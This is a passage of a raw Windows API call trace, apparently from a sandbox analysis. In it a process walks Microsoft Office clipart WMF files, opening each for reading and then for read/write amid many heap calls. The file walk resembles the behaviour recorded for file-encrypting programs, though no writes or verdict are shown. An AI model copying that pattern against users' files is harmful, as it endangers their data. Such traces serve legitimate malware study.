ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3896)) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0102.325] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.325] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.325] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4780, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD19988_.WMF", cAlternateFileName="")) returned 1 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0102.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0102.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0102.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0102.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0102.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0102.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.326] AreFileApisANSI () returned 1 [0102.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0102.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.326] AreFileApisANSI () returned 1 [0102.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0102.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 69 [0102.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.327] GetFileType (hFile=0x368) returned 0x1 [0102.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0102.327] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.327] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.327] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.327] CloseHandle (hObject=0x368) returned 1 [0102.328] AreFileApisANSI () returned 1 [0102.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 69 [0102.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.328] GetFileType (hFile=0x368) returned 0x1 [0102.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.328] CloseHandle (hObject=0x368) returned 1 [0102.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0102.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0102.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.329] AreFileApisANSI () returned 1 [0102.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0102.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 69 [0102.329] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4780)) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0102.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.330] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b32, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD20013_.WMF", cAlternateFileName="")) returned 1 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0102.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.330] AreFileApisANSI () returned 1 [0102.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0102.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0102.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.331] AreFileApisANSI () returned 1 [0102.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0102.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 69 [0102.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.400] GetFileType (hFile=0x368) returned 0x1 [0102.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.400] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.401] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.401] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.401] CloseHandle (hObject=0x368) returned 1 [0102.402] AreFileApisANSI () returned 1 [0102.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0102.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 69 [0102.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.402] GetFileType (hFile=0x368) returned 0x1 [0102.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0102.402] CloseHandle (hObject=0x368) returned 1 [0102.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) 